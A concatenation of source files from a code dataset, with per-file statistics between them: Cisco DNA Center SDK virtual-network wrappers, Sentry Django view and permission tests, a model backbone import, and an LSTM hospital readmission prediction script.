MyDict: JSON response. Access the object's properties by using
the dot notation or the bracket notation.
Raises:
TypeError: If the parameter types are incorrect.
MalformedRequest: If the request body created is invalid.
ApiError: If the DNA Center cloud returns an error.
"""
check_type(headers, dict)
check_type(virtual_network_name, basestring,
may_be_none=False)
if headers is not None:
if 'X-Auth-Token' in headers:
check_type(headers.get('X-Auth-Token'),
basestring, may_be_none=False)
_params = {
'virtualNetworkName':
virtual_network_name,
}
_params.update(request_parameters)
_params = dict_from_items_with_values(_params)
path_params = {
}
with_custom_headers = False
_headers = self._session.headers or {}
if headers:
_headers.update(dict_of_str(headers))
with_custom_headers = True
e_url = ('/dna/intent/api/v1/virtual-network')
endpoint_full_url = apply_path_params(e_url, path_params)
if with_custom_headers:
json_data = self._session.get(endpoint_full_url, params=_params,
headers=_headers)
else:
json_data = self._session.get(endpoint_full_url, params=_params)
return self._object_factory('bpm_ea4b1c052b855bd9a0e99f803e6185a5_v2_2_2_3', json_data)
def update_virtual_network_with_scalable_groups(self,
scalableGroupNames=None,
virtualNetworkName=None,
virtualNetworkType=None,
headers=None,
payload=None,
active_validation=True,
**request_parameters):
"""Update virtual network with scalable groups .
Args:
scalableGroupNames(list): SDA's Scalable Group Names (list of strings).
virtualNetworkName(string): SDA's Virtual Network Name.
virtualNetworkType(string): SDA's Virtual Network Type.
headers(dict): Dictionary of HTTP Headers to send with the Request.
payload(dict): A JSON serializable Python object to send in the
body of the Request.
active_validation(bool): Enable/Disable payload validation.
Defaults to True.
**request_parameters: Additional request parameters (provides
support for parameters that may be added in the future).
Returns:
MyDict: JSON response. Access the object's properties by using
the dot notation or the bracket notation.
Raises:
TypeError: If the parameter types are incorrect.
MalformedRequest: If the request body created is invalid.
ApiError: If the DNA Center cloud returns an error.
"""
check_type(headers, dict)
check_type(payload, dict)
if headers is not None:
if 'X-Auth-Token' in headers:
check_type(headers.get('X-Auth-Token'),
basestring, may_be_none=False)
_params = {
}
_params.update(request_parameters)
_params = dict_from_items_with_values(_params)
path_params = {
}
_payload = {
'virtualNetworkName':
virtualNetworkName,
'virtualNetworkType':
virtualNetworkType,
'scalableGroupNames':
scalableGroupNames,
}
_payload.update(payload or {})
_payload = dict_from_items_with_values(_payload)
if active_validation:
self._request_validator('jsd_f9492367570c5f009cf8b5955790e87c_v2_2_2_3')\
.validate(_payload)
with_custom_headers = False
_headers = self._session.headers or {}
if headers:
_headers.update(dict_of_str(headers))
with_custom_headers = True
e_url = ('/dna/intent/api/v1/virtual-network')
endpoint_full_url = apply_path_params(e_url, path_params)
if with_custom_headers:
json_data = self._session.put(endpoint_full_url, params=_params,
json=_payload,
headers=_headers)
else:
json_data = self._session.put(endpoint_full_url, params=_params,
json=_payload)
return self._object_factory('bpm_f9492367570c5f009cf8b5955790e87c_v2_2_2_3', json_data)
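Taken together, these wrappers are reached through the SDK's top-level client. A minimal end-to-end sketch, assuming dnacentersdk's documented DNACenterAPI entry point; the host, credentials, and network/group names below are placeholders:
from dnacentersdk import DNACenterAPI

# Placeholder connection details; verify=False is for lab use only.
api = DNACenterAPI(base_url='https://dnacenter.example.com',
                   username='admin', password='secret',
                   version='2.2.2.3', verify=False)

# Create a virtual network bound to a scalable group, then read it back.
api.sda.add_virtual_network_with_scalable_groups(
    virtualNetworkName='GUEST_VN',
    virtualNetworkType='ISOLATED',  # type value is an illustrative assumption
    scalableGroupNames=['Guests'])
vn = api.sda.get_virtual_network_with_scalable_groups(
    virtual_network_name='GUEST_VN')
print(vn.virtualNetworkName)  # MyDict responses support dot access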
| 39.861969
| 116
| 0.578349
| 11,365
| 109,740
| 5.310339
| 0.029916
| 0.049576
| 0.037182
| 0.027704
| 0.943399
| 0.925587
| 0.922969
| 0.917517
| 0.904924
| 0.898512
| 0
| 0.020005
| 0.359103
| 109,740
| 2,752
| 117
| 39.876453
| 0.838096
| 0.29815
| 0
| 0.851172
| 0
| 0
| 0.090931
| 0.067071
| 0
| 0
| 0
| 0
| 0
| 1
| 0.028499
| false
| 0
| 0.0038
| 0
| 0.060798
| 0.000633
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
67bfcc1f620ba5d8662087fca10b52873671ae89
| 17,993
|
py
|
Python
|
tests/sentry/web/frontend/tests.py
|
rogerhu/sentry
|
ee2b190e92003abe0f538b2df5b686e425df1200
|
[
"BSD-3-Clause"
] | 1
|
2015-12-13T18:27:54.000Z
|
2015-12-13T18:27:54.000Z
|
tests/sentry/web/frontend/tests.py
|
simmetria/sentry
|
9731f26adb44847d1c883cca108afc0755cf21cc
|
[
"BSD-3-Clause"
] | null | null | null |
tests/sentry/web/frontend/tests.py
|
simmetria/sentry
|
9731f26adb44847d1c883cca108afc0755cf21cc
|
[
"BSD-3-Clause"
] | null | null | null |
# -*- coding: utf-8 -*-
from __future__ import absolute_import
import logging
import json
from django.contrib.auth.models import User
from django.core.urlresolvers import reverse
from sentry.conf import settings
from sentry.constants import MEMBER_USER
from sentry.models import Group, Project, TeamMember, Team
from sentry.testutils import fixture
from sentry.testutils import TestCase
logger = logging.getLogger(__name__)
class SentryViewsTest(TestCase):
fixtures = ['tests/fixtures/views.json']
@fixture
def user(self):
user = User(username="admin", email="admin@localhost", is_staff=True, is_superuser=True)
user.set_password('password')
user.save()
return user
def test_dashboard(self):
# with no projects, the user is redirected to the new-project page
self.client.login(username=self.user.username, password='password')
resp = self.client.get(reverse('sentry'), follow=True)
self.assertEquals(resp.status_code, 200)
self.assertTemplateUsed(resp, 'sentry/projects/new.html')
# requires at least one project to show dashboard
Project.objects.create(name='foo', owner=self.user)
Project.objects.create(name='bar', owner=self.user).team
resp = self.client.get(reverse('sentry'), follow=True)
self.assertEquals(resp.status_code, 200)
self.assertTemplateUsed(resp, 'sentry/dashboard.html')
# no projects and unauthenticated
self.client.logout()
Project.objects.all().delete()
resp = self.client.get(reverse('sentry'), follow=True)
self.assertEquals(resp.status_code, 200)
self.assertTemplateUsed(resp, 'sentry/login.html')
def test_index(self):
self.client.login(username=self.user.username, password='password')
resp = self.client.get(reverse('sentry', kwargs={'project_id': 1}) + '?sort=freq', follow=False)
self.assertEquals(resp.status_code, 200)
self.assertTemplateUsed(resp, 'sentry/groups/group_list.html')
def test_group_details(self):
self.client.login(username=self.user.username, password='password')
resp = self.client.get(reverse('sentry-group', kwargs={'project_id': 1, 'group_id': 2}), follow=False)
self.assertEquals(resp.status_code, 200, resp.content)
self.assertTemplateUsed(resp, 'sentry/groups/details.html')
self.assertTrue('group' in resp.context)
group = Group.objects.get(pk=2)
self.assertEquals(resp.context['group'], group)
def test_group_event_list(self):
self.client.login(username=self.user.username, password='password')
resp = self.client.get(reverse('sentry-group-events', kwargs={'project_id': 1, 'group_id': 2}), follow=False)
self.assertEquals(resp.status_code, 200, resp.content)
self.assertTemplateUsed(resp, 'sentry/groups/event_list.html')
self.assertTrue('group' in resp.context)
group = Group.objects.get(pk=2)
self.assertEquals(resp.context['group'], group)
def test_group_message_details(self):
self.client.login(username=self.user.username, password='password')
resp = self.client.get(reverse('sentry-group-event', kwargs={'project_id': 1, 'group_id': 2, 'event_id': 4}), follow=True)
self.assertEquals(resp.status_code, 200, resp.content)
self.assertTemplateUsed(resp, 'sentry/groups/event.html')
self.assertTrue('group' in resp.context)
group = Group.objects.get(pk=2)
self.assertEquals(resp.context['group'], group)
def test_group_json_multi(self):
self.client.login(username=self.user.username, password='password')
resp = self.client.get(reverse('sentry-group-events-json', kwargs={'project_id': 1, 'group_id': 2}))
self.assertEquals(resp.status_code, 200)
self.assertEquals(resp['Content-Type'], 'application/json')
self.assertEquals(json.loads(resp.content)[0]['level'], 'error')
resp = self.client.get(reverse('sentry-group-events-json', kwargs={'project_id': 1, 'group_id': 2}), {'limit': 1})
self.assertEquals(resp.status_code, 200)
resp = self.client.get(reverse('sentry-group-events-json', kwargs={'project_id': 1, 'group_id': 2}), {'limit': settings.MAX_JSON_RESULTS + 1})
self.assertEquals(resp.status_code, 400)
def test_group_events_details_json(self):
self.client.login(username=self.user.username, password='password')
resp = self.client.get(reverse('sentry-group-event-json', kwargs={'project_id': 1, 'group_id': 2, 'event_id_or_latest': 'latest'}))
self.assertEquals(resp.status_code, 200)
self.assertEquals(resp['Content-Type'], 'application/json')
self.assertEquals(json.loads(resp.content)['level'], 'error')
def test_status_env(self):
self.client.login(username=self.user.username, password='password')
resp = self.client.get(reverse('sentry-admin-status'), follow=True)
self.assertEquals(resp.status_code, 200)
self.assertTemplateUsed(resp, 'sentry/admin/status/env.html')
def test_status_packages(self):
self.client.login(username=self.user.username, password='password')
resp = self.client.get(reverse('sentry-admin-packages-status'), follow=True)
self.assertEquals(resp.status_code, 200)
self.assertTemplateUsed(resp, 'sentry/admin/status/packages.html')
def test_status_mail(self):
self.client.login(username=self.user.username, password='password')
resp = self.client.get(reverse('sentry-admin-mail-status'), follow=True)
self.assertEquals(resp.status_code, 200)
self.assertTemplateUsed(resp, 'sentry/admin/status/mail.html')
def test_stats(self):
self.client.login(username=self.user.username, password='password')
resp = self.client.get(reverse('sentry-admin-stats'), follow=True)
self.assertEquals(resp.status_code, 200)
self.assertTemplateUsed(resp, 'sentry/admin/stats.html')
def test_manage_users(self):
self.client.login(username=self.user.username, password='password')
resp = self.client.get(reverse('sentry-admin-users'), follow=True)
self.assertEquals(resp.status_code, 200)
self.assertTemplateUsed(resp, 'sentry/admin/users/list.html')
def test_event_list(self):
self.client.login(username=self.user.username, password='password')
resp = self.client.get(reverse('sentry-events', kwargs={'project_id': 1}))
self.assertEquals(resp.status_code, 200)
self.assertTemplateUsed(resp, 'sentry/events/event_list.html')
def test_replay_event(self):
# bad event_id
self.client.login(username=self.user.username, password='password')
resp = self.client.get(reverse('sentry-replay', kwargs={'project_id': 1, 'event_id': 1}))
self.assertEquals(resp.status_code, 302)
# valid params
# self.client.login(username='admin', password='admin')
# resp = self.client.get(reverse('sentry-replay', kwargs={'project_id': 1, 'event_id': 4}))
# self.assertEquals(resp.status_code, 200)
# self.assertTemplateUsed(resp, 'sentry/events/replay.html')
class PermissionBase(TestCase):
"""
These tests simply ensure permission requirements for various views.
"""
fixtures = ['tests/fixtures/views.json']
@fixture
def admin(self):
user = User(username="admin", email="admin@localhost", is_staff=True, is_superuser=True)
user.set_password('admin')
user.save()
return user
@fixture
def member(self):
user = User(username="member", email="member@localhost")
user.set_password('member')
user.save()
TeamMember.objects.create(
user=user,
team=self.team,
type=MEMBER_USER,
)
return user
@fixture
def nobody(self):
user = User(username="nobody", email="nobody@localhost")
user.set_password('nobody')
user.save()
return user
@fixture
def owner(self):
user = User(username="owner", email="owner@localhost")
user.set_password('owner')
user.save()
Team.objects.create(owner=user, name='foo', slug='foo')
return user
@fixture
def tm(self):
return TeamMember.objects.get(user=self.member, team=self.team)
@fixture
def team(self):
return Team.objects.get(owner=self.owner, slug='foo')
@fixture
def project(self):
project = Project.objects.get(id=1)
project.update(public=False, team=self.team)
return project
def _assertPerm(self, path, template, account=None, want=True):
"""
Requests ``path`` and asserts that ``template`` is
rendered for ``account`` (Anonymous if None) when ``want``
is truthy, and that access is denied otherwise.
"""
if account:
self.assertTrue(self.client.login(username=account, password=account))
else:
self.client.logout()
resp = self.client.get(path)
if want:
self.assertEquals(resp.status_code, 200)
self.assertTemplateUsed(resp, template)
else:
self.assertEquals(resp.status_code, 302)
self.assertTemplateNotUsed(resp, template)
class ProjectListTest(PermissionBase):
template = 'sentry/projects/list.html'
@fixture
def path(self):
return reverse('sentry-project-list')
def test_admin_can_load(self):
self._assertPerm(self.path, self.template, self.admin.username)
def test_user_can_load(self):
self._assertPerm(self.path, self.template, self.nobody.username)
def test_anonymous_cannot_load(self):
self._assertPerm(self.path, self.template, None, False)
class NewProjectTest(PermissionBase):
template = 'sentry/projects/new.html'
@fixture
def path(self):
return reverse('sentry-new-project')
def test_admin_can_load(self):
with self.Settings(SENTRY_ALLOW_PROJECT_CREATION=False, SENTRY_ALLOW_TEAM_CREATION=False):
self._assertPerm(self.path, self.template, self.admin.username)
def test_user_cannot_load(self):
with self.Settings(SENTRY_ALLOW_PROJECT_CREATION=False, SENTRY_ALLOW_TEAM_CREATION=False):
self._assertPerm(self.path, self.template, self.nobody.username, False)
def test_anonymous_cannot_load(self):
with self.Settings(SENTRY_ALLOW_PROJECT_CREATION=False, SENTRY_ALLOW_TEAM_CREATION=False):
self._assertPerm(self.path, self.template, None, False)
def test_public_creation_admin_can_load(self):
with self.Settings(SENTRY_ALLOW_PROJECT_CREATION=True, SENTRY_ALLOW_TEAM_CREATION=True):
self._assertPerm(self.path, self.template, self.admin.username)
def test_public_creation_user_can_load(self):
with self.Settings(SENTRY_ALLOW_PROJECT_CREATION=True, SENTRY_ALLOW_TEAM_CREATION=True):
self._assertPerm(self.path, self.template, self.nobody.username)
def test_public_anonymous_cannot_load(self):
with self.Settings(SENTRY_ALLOW_PROJECT_CREATION=True, SENTRY_ALLOW_TEAM_CREATION=True):
self._assertPerm(self.path, self.template, None, False)
class ManageProjectTest(PermissionBase):
template = 'sentry/projects/manage.html'
@fixture
def path(self):
return reverse('sentry-manage-project', kwargs={'project_id': self.project.id})
def test_admin_can_load(self):
self._assertPerm(self.path, self.template, self.admin.username)
def test_owner_can_load(self):
self._assertPerm(self.path, self.template, self.owner.username)
def test_anonymous_cannot_load(self):
self._assertPerm(self.path, self.template, None, False)
def test_user_cannot_load(self):
self._assertPerm(self.path, self.template, self.nobody.username, False)
def test_member_cannot_load(self):
self._assertPerm(self.path, self.template, self.member.username, False)
class RemoveProjectTest(PermissionBase):
template = 'sentry/projects/remove.html'
@fixture
def path(self):
return reverse('sentry-remove-project', kwargs={'project_id': self.project.id})
def test_admin_cannot_remove_default(self):
with self.Settings(SENTRY_PROJECT=1):
self._assertPerm(self.path, self.template, self.admin.username, False)
def test_owner_cannot_remove_default(self):
with self.Settings(SENTRY_PROJECT=1):
self._assertPerm(self.path, self.template, self.owner.username, False)
def test_anonymous_cannot_remove_default(self):
with self.Settings(SENTRY_PROJECT=1):
self._assertPerm(self.path, self.template, None, False)
def test_user_cannot_remove_default(self):
with self.Settings(SENTRY_PROJECT=1):
self._assertPerm(self.path, self.template, self.nobody.username, False)
def test_member_cannot_remove_default(self):
with self.Settings(SENTRY_PROJECT=1):
self._assertPerm(self.path, self.template, self.member.username, False)
def test_admin_can_load(self):
with self.Settings(SENTRY_PROJECT=2):
self._assertPerm(self.path, self.template, self.admin.username)
def test_owner_can_load(self):
with self.Settings(SENTRY_PROJECT=2):
self._assertPerm(self.path, self.template, self.owner.username)
def test_anonymous_cannot_load(self):
with self.Settings(SENTRY_PROJECT=2):
self._assertPerm(self.path, self.template, None, False)
def test_user_cannot_load(self):
with self.Settings(SENTRY_PROJECT=2):
self._assertPerm(self.path, self.template, self.nobody.username, False)
def test_member_cannot_load(self):
with self.Settings(SENTRY_PROJECT=2):
self._assertPerm(self.path, self.template, self.member.username, False)
class NewTeamMemberTest(PermissionBase):
template = 'sentry/teams/members/new.html'
@fixture
def path(self):
return reverse('sentry-new-team-member', kwargs={'team_slug': self.team.slug})
def test_admin_can_load(self):
self._assertPerm(self.path, self.template, self.admin.username)
def test_owner_can_load(self):
self._assertPerm(self.path, self.template, self.owner.username)
def test_anonymous_cannot_load(self):
self._assertPerm(self.path, self.template, None, False)
def test_user_cannot_load(self):
self._assertPerm(self.path, self.template, self.nobody.username, False)
def test_member_cannot_load(self):
self._assertPerm(self.path, self.template, self.member.username, False)
class EditTeamMemberTest(PermissionBase):
template = 'sentry/teams/members/edit.html'
@fixture
def path(self):
return reverse('sentry-edit-team-member', kwargs={'team_slug': self.team.slug, 'member_id': self.tm.pk})
def test_admin_can_load(self):
self._assertPerm(self.path, self.template, self.admin.username)
def test_owner_can_load(self):
self._assertPerm(self.path, self.template, self.owner.username)
def test_anonymous_cannot_load(self):
self._assertPerm(self.path, self.template, None, False)
def test_user_cannot_load(self):
self._assertPerm(self.path, self.template, self.nobody.username, False)
def test_member_cannot_load(self):
self._assertPerm(self.path, self.template, self.member.username, False)
class RemoveTeamMemberTest(PermissionBase):
template = 'sentry/teams/members/remove.html'
@fixture
def path(self):
return reverse('sentry-remove-team-member', kwargs={'team_slug': self.team.slug, 'member_id': self.tm.pk})
def test_admin_can_load(self):
self._assertPerm(self.path, self.template, self.admin.username)
def test_owner_can_load(self):
self._assertPerm(self.path, self.template, self.owner.username)
def test_anonymous_cannot_load(self):
self._assertPerm(self.path, self.template, None, False)
def test_user_cannot_load(self):
self._assertPerm(self.path, self.template, self.nobody.username, False)
def test_member_cannot_load(self):
self._assertPerm(self.path, self.template, self.member.username, False)
class SentrySearchTest(TestCase):
def test_checksum_query(self):
checksum = 'a' * 32
g = Group.objects.create(
project_id=1,
logger='root',
culprit='a',
checksum=checksum,
message='hi',
)
with self.Settings(SENTRY_PUBLIC=True):
response = self.client.get(reverse('sentry-search', kwargs={'project_id': 1}), {'q': '%s$%s' % (checksum, checksum)})
self.assertEquals(response.status_code, 302)
self.assertEquals(response['Location'], 'http://testserver%s' % (g.get_absolute_url(),))
def test_dupe_checksum(self):
checksum = 'a' * 32
g1 = Group.objects.create(
project_id=1,
logger='root',
culprit='a',
checksum=checksum,
message='hi',
)
g2 = Group.objects.create(
project_id=1,
logger='root',
culprit='b',
checksum=checksum,
message='hi',
)
with self.Settings(SENTRY_PUBLIC=True, SENTRY_USE_SEARCH=False):
response = self.client.get(reverse('sentry-search', kwargs={'project_id': 1}), {'q': '%s$%s' % (checksum, checksum)})
self.assertEquals(response.status_code, 200)
self.assertTemplateUsed(response, 'sentry/search.html')
context = response.context
self.assertTrue('event_list' in context)
self.assertEquals(len(context['event_list']), 2)
self.assertTrue(g1 in context['event_list'])
self.assertTrue(g2 in context['event_list'])
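The tests above lean on sentry.testutils.fixture for lazily built, per-test objects such as self.user or self.team. A rough sketch of the idea (an approximation for readers, not Sentry's actual implementation):
def fixture(func):
    """Cache the fixture per test instance and expose it as an attribute."""
    attr = '_fixture_' + func.__name__
    def getter(self):
        if not hasattr(self, attr):
            setattr(self, attr, func(self))
        return getattr(self, attr)
    return property(getter)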
| 39.200436
| 150
| 0.677764
| 2,221
| 17,993
| 5.336785
| 0.089599
| 0.032481
| 0.060744
| 0.072387
| 0.760145
| 0.745803
| 0.733654
| 0.721168
| 0.705644
| 0.687843
| 0
| 0.008433
| 0.195965
| 17,993
| 458
| 151
| 39.286026
| 0.81088
| 0.034069
| 0
| 0.559524
| 0
| 0
| 0.106722
| 0.047702
| 0
| 0
| 0
| 0
| 0.279762
| 1
| 0.21131
| false
| 0.059524
| 0.029762
| 0.026786
| 0.342262
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
e1e386100ddd38eafbb9893db22af86e9d7a950d
| 188
|
py
|
Python
|
models/backbones/__init__.py
|
hrlblab/SimTriplet
|
66e1198adda88e2f6f146bc9cc570e4bf085c109
|
[
"Apache-2.0"
] | 12
|
2021-03-11T20:39:17.000Z
|
2022-03-17T06:12:27.000Z
|
models/backbones/__init__.py
|
hrlblab/SimTriplet
|
66e1198adda88e2f6f146bc9cc570e4bf085c109
|
[
"Apache-2.0"
] | 3
|
2021-04-14T15:34:00.000Z
|
2022-02-04T13:10:41.000Z
|
models/backbones/__init__.py
|
hrlblab/SimTriplet
|
66e1198adda88e2f6f146bc9cc570e4bf085c109
|
[
"Apache-2.0"
] | 7
|
2021-03-12T01:54:01.000Z
|
2022-02-20T02:57:31.000Z
|
from .cifar_resnet_1 import resnet18 as resnet18_cifar_variant1
from .cifar_resnet_2 import ResNet18 as resnet18_cifar_variant2
from .cifar_resnet_1 import resnet50 as resnet50_TCGA
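# Hedged usage sketch (not part of the repo): the aliases above act as
# interchangeable backbone constructors, e.g.
#   from models.backbones import resnet18_cifar_variant1
#   backbone = resnet18_cifar_variant1()  # call signature assumed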
| 18.8
| 63
| 0.856383
| 29
| 188
| 5.172414
| 0.413793
| 0.18
| 0.3
| 0.213333
| 0.64
| 0
| 0
| 0
| 0
| 0
| 0
| 0.103659
| 0.12766
| 188
| 9
| 64
| 20.888889
| 0.810976
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
e1ee3f8702accea8034c7cbe2de6568e7be4efed
| 39,614
|
py
|
Python
|
lstm_predict.py
|
caisr-hh/lstm_predict
|
3e0d49987158b0c1607eca816589143c39ec97fb
|
[
"MIT"
] | 4
|
2020-01-09T22:05:07.000Z
|
2020-10-01T21:08:51.000Z
|
lstm_predict.py
|
caisr-hh/lstm_predict
|
3e0d49987158b0c1607eca816589143c39ec97fb
|
[
"MIT"
] | null | null | null |
lstm_predict.py
|
caisr-hh/lstm_predict
|
3e0d49987158b0c1607eca816589143c39ec97fb
|
[
"MIT"
] | 6
|
2019-08-27T08:55:43.000Z
|
2021-03-01T22:22:31.000Z
|
# -*- coding: utf-8 -*-
"""
Created on Mon Mar 12 08:51:35 2019
@author: aaq109
"""
import timeit
import numpy as np
from numpy import array
from keras.models import *
from keras.layers import *
from keras import backend as K
from keras.callbacks import EarlyStopping, ModelCheckpoint
from keras.preprocessing import sequence
from sklearn.model_selection import train_test_split
from sklearn.metrics import *
from tensorflow.keras.callbacks import EarlyStopping, Callback
from sklearn.metrics import roc_curve, auc
import matplotlib.pyplot as plt
import pandas as pd
from scipy import stats
# Read data
N_visits=15 # Maximum number of inpatient visits in the dataset
def read_data(exp, N_visits):
label='sampledata_lstm_'+str(N_visits)+'.csv'
print('Reading File: ',label)
pidAdmMap = {}
admDetailMap={}
output=[]
Weights=[]
VisitIds=[]
if exp[0:2]=='11':
ind1=6
ind2=202
elif exp[0:2]=='10':
ind1=6
ind2=17
else:
ind1=17
ind2=202
infd = open(label, 'r')
infd.readline()
for line in infd:
tokens = line.strip().split(',')
pid=int(tokens[0])
admId=(tokens[1])
det=(tokens[ind1:ind2]) #200 if 185 d2v vector is used
output.append(tokens[5])
Weights.append(tokens[203])
VisitIds.append(tokens[1])
if admId in admDetailMap:
admDetailMap[admId].append(det)
else:
admDetailMap[admId]=det
if pid in pidAdmMap:
pidAdmMap[pid].append(admId)
else:
pidAdmMap[pid]=[admId]
infd.close()
_list = []
for patient in pidAdmMap.keys():
a = [admDetailMap[xx] for xx in pidAdmMap[patient]]
_list.append(a)
X=np.array([np.array(xi) for xi in _list])
a,b,c=X.shape
Y=np.array(output)
Sample_weight=np.array(Weights)
X = X.astype(float)
Y = Y.astype(float)
Sample_weight = Sample_weight.astype(float)
Y=Y.reshape(X.shape[0],N_visits,1)
return X, Y,Sample_weight,VisitIds
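# Shape sketch for read_data's outputs (patient count is illustrative; the
# feature count follows the ind1/ind2 slices above: 196 columns for exp '11..',
# 11 for '10..', 185 doc2vec columns otherwise):
#   X:             (n_patients, N_visits, n_features)
#   Y:             (n_patients, N_visits, 1) binary readmission labels
#   Sample_weight: (n_patients * N_visits,) with 0 marking padded dummy visits
#   VisitIds:      flat list of admission ids, one per visit row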
def ppv(y_true, y_pred):
true_positives = K.sum(K.round(K.clip(y_true * y_pred, 0, 1)))
predicted_positives = K.sum(K.round(K.clip(y_pred, 0, 1)))
ppv = true_positives / (predicted_positives + K.epsilon())
return ppv
def npv(y_true, y_pred):
true_negatives = K.sum(K.round(K.clip((1 - y_true) * (1 - y_pred), 0, 1)))
predicted_negatives = K.sum(K.round(K.clip(1-y_pred, 0, 1)))
npv = true_negatives / (predicted_negatives + K.epsilon())
return npv
def sensitivity(y_true, y_pred):
true_positives = K.sum(K.round(K.clip(y_true * y_pred, 0, 1)))
possible_positives = K.sum(K.round(K.clip(y_true, 0, 1)))
return true_positives / (possible_positives + K.epsilon())
def specificity(y_true, y_pred):
true_negatives = K.sum(K.round(K.clip((1-y_true) * (1-y_pred), 0, 1)))
possible_negatives = K.sum(K.round(K.clip(1-y_true, 0, 1)))
return true_negatives / (possible_negatives + K.epsilon())
def recall(y_true, y_pred):
true_positives = K.sum(K.round(K.clip(y_true * y_pred, 0, 1)))
possible_positives = K.sum(K.round(K.clip(y_true, 0, 1)))
recall = true_positives / (possible_positives + K.epsilon())
return recall
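# Quick sanity check for the backend metrics above (editorial sketch; run
# separately, values chosen by hand):
#   y_true = K.constant(np.array([1., 1., 0., 0.]))
#   y_pred = K.constant(np.array([0.9, 0.2, 0.1, 0.8]))
#   K.eval(sensitivity(y_true, y_pred))  # 1 TP of 2 positives -> ~0.5
#   K.eval(specificity(y_true, y_pred))  # 1 TN of 2 negatives -> ~0.5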
def model_eval(model, X_test,Y_test, Sample_weight_test,exp,X_train,Y_train,Sample_weight_train):
from sklearn.preprocessing import binarize
from sklearn.metrics import f1_score
from sklearn.metrics import balanced_accuracy_score,accuracy_score
import operator
y_pred = model.predict(X_train).ravel()
y_test=Y_train.ravel()
g=Sample_weight_train.ravel()
g[g==0]=0
g[g>0]=1
indices=np.where(g==0)
y_pred=np.delete(y_pred,indices,0)
y_test=np.delete(y_test,indices,0)
score={}
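# Threshold search on the training predictions: each true positive is credited
# with averting half of a 48,000 readmission cost, while every flagged visit
# (TP + FP) is charged a 7,000 intervention cost; the 0.5 factor and the two
# cost constants are the script's own assumptions.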
for thresh in np.arange(0.001,1,0.001):
y_pred_class=binarize([y_pred],thresh)[0]
cm= confusion_matrix(y_test, y_pred_class)
score[thresh]=(48000*cm[1,1]*0.5)-(7000*(cm[1,1]+cm[0,1]))
thresh=max(score.items(), key=operator.itemgetter(1))[0]
y_pred = model.predict(X_test).ravel()
y_test=Y_test.ravel()
g=Sample_weight_test.ravel()
g[g==0]=0
g[g>0]=1
if exp[2]=='1':
fpr, tpr, thetas = roc_curve(y_test, y_pred,sample_weight=g,pos_label=1)
prc, recal, thetas = precision_recall_curve(y_test, y_pred,sample_weight=g)
indices=np.where(g==0) # drop zero-weight (dummy) visits
y_pred=np.delete(y_pred,indices,0)
y_test=np.delete(y_test,indices,0)
else:
fpr, tpr, thetas = roc_curve(y_test, y_pred,pos_label=1)
prc, recal, thetas = precision_recall_curve(y_test, y_pred)
AUC_test = auc(fpr, tpr)
PR_auc = auc(recal,prc)
y_pred=binarize([y_pred],thresh)[0]
cm= confusion_matrix(y_test, y_pred)
cost_saved=(48000*cm[1,1]*0.5)-(7000*(cm[1,1]+cm[0,1]))
Accuracy=(cm[0,0]+cm[1,1])/sum(sum(cm))
Sensitivity_test=cm[1,1]/(cm[1,0]+cm[1,1])
Specificity_test=cm[0,0]/(cm[0,0]+cm[0,1])
F1_score=f1_score(y_test,y_pred)
cost_saved=cost_saved/(np.sum(y_test)*(48000-7000)*0.5)
return Accuracy, AUC_test, Sensitivity_test, Specificity_test, PR_auc, F1_score,cost_saved
def save_print(AUC_test, Sensitivity_test, Specificity_test, PR_auc,F1_score,cost_saved, exp):
label1='AUC_test_'+exp+'.npy'
label2='Sensitivity_test_'+exp+'.npy'
label3='Specificity_test_'+exp+'.npy'
label4='PR_auc_'+exp+'.npy'
label5='f1_score_'+exp+'.npy'
label6='cost_saved_'+exp+'.npy'
np.save(label1, AUC_test)
np.save(label2, Sensitivity_test)
np.save(label3, Specificity_test)
np.save(label4, PR_auc)
np.save(label5, F1_score)
np.save(label6, cost_saved)
val1=np.fromiter(AUC_test.values(), dtype=float)
val2=np.fromiter(Sensitivity_test.values(), dtype=float)
val3=np.fromiter(Specificity_test.values(), dtype=float)
val4=np.fromiter(PR_auc.values(), dtype=float)
val5=np.fromiter(F1_score.values(), dtype=float)
val6=np.fromiter(cost_saved.values(), dtype=float)
print(label1,[np.mean(val1[np.nonzero(val1)]),np.std(val1[np.nonzero(val1)])])
print(label2,[np.mean(val2[np.nonzero(val2)]),np.std(val2[np.nonzero(val2)])])
print(label3,[np.mean(val3[np.nonzero(val3)]),np.std(val3[np.nonzero(val3)])])
print(label4,[np.mean(val4[np.nonzero(val4)]),np.std(val4[np.nonzero(val4)])])
print(label5,[np.mean(val5[np.nonzero(val5)]),np.std(val5[np.nonzero(val5)])])
print(label6,[np.mean(val6[np.nonzero(val6)]),np.std(val6[np.nonzero(val6)])])
return None
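# Note: np.save on a dict stores a 0-d object array, so reading these result
# files back requires allow_pickle, e.g.
#   auc = np.load('AUC_test_1111.npy', allow_pickle=True).item()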
## Define different experiments
# 1111 - HDF+MDF+LSTM+CA
exp='1111'
AUC_test={}
Accuracy_test={}
PR_auc={}
Sensitivity_test={}
Specificity_test={}
average_precision={}
F1_score={}
cost_saved={}
#Set Params
W_classA=0 #Dummy visit weights
W_classB=1 #No readmission class weight
W_classC=3 #Readmission class weight
E_pochs=80 # Training epochs
B_size=32 # Batch size
T_size=0.3 # Samples used for testing
NN_nodes=[128,64,32,1] # Number of nodes in the NN
N_iter=10
X, Y, Sample_weight,VisitIds=read_data(exp, N_visits)
Sample_weight[Sample_weight==0]=W_classA
Sample_weight[Sample_weight==1]=W_classB
Sample_weight[Sample_weight==2]=W_classC
